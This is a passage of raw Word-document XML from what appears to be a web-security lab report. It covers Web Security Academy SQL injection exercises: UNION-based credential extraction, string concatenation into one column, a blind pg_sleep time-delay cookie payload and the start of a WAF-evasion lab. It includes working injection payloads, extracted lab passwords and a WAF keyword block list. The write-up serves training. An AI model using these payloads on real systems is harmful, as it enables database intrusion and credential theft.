      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PASSWORD_YRNEQD</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Step 3: Exfiltration Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="ng-tns-c507410133-71"/>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/filter?category='+UNION+SELECT+USERNAME_BXFGTY,PASSWORD_YRNEQD+FROM+USERS_TPQMKX--</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i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Extracted Credentials:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>administrator : q2iotps50fnhe26yee2f</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Authenticated as the administrator user to solve the challenge. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lab 10: Single-Column Bottleneck Bypass via String Concatenation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> In many web applications, only a single column within the original query accepts string input, yet multiple fields (such as usernames and passwords) must be extracted. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use string concatenation functions to merge distinct data fields into a single unified column, separated by a unique delimiter (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</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Execution:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="ng-tns-c507410133-72"/>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/filter?category='+UNION+SELECT+1,username||':'||password+FROM+users--</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-meta"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Result:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The application outputted concatenated rows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>administrator:4jekjlitj9o29evcxalv</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>carlos:jdhl6lrr7nvbslre2s63</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wiener:7mykq5cq84r3hji9x060</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Impact:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Proved that restricting the number of string-compatible display columns provides no defensive advantage against data exfiltration. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4.4 Advanced Practitioner Work: Blind Time Delays &amp; WAF Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lab 14: Blind SQL Injection with Time Delays</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerable Endpoint:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tracking Cookie (</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cookie: TrackingId=...</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Context:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The application utilized the </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TrackingId</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> cookie inside a synchronous database query to log visitor analytics. Because the application returned an identical visual response regardless of query success or error, in-band and boolean techniques were ineffective. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Methodology:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Trigger an intentional, measurable time delay within the database engine using PostgreSQL's </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pg_sleep()</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> function. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Payload Construction:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="ng-tns-c507410133-73"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HTTP</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GET</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-meta"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HTTP/2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-attribute"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Host</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-punctuation"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[TARGET_ID].web-security-academy.net</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-attribute"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-punctuation"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TrackingId=x'||pg_sleep(10)--; session=[SESSION_ID]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Execution &amp; Verification:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The request was sent via Burp Repeater. The network socket remained open while the database executed the sleep command, returning the HTTP response in </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10,198 milliseconds</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (~10.2 seconds). This confirmed the </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">time-delay vulnerability and verified that synchronous, blind time-based inference could be used to extract the complete database character by character. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lab 18: WAF Evasion via XML Hex Entity Encoding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerable Feature:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Stock Check Module (</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>POST /product/stock</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Perimeter Defense:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The web application sat behind a Web Application Firewall (WAF) running signature-based filters that inspected raw HTTP POST payloads, immediately blocking requests containing keywords such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, or comments (</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Architectural Flaw:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The application endpoint accepted data in XML format:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="ng-tns-c507410133-74"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-tag"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-name"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>stockCheck</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tag"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-name"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>productId</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-tag"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-tag"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-name"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>productId</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tag"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-name"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>storeId</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-tag"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-tag"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-name"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>storeId</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ljs-tag"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-name"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>stockCheck</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-tag"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
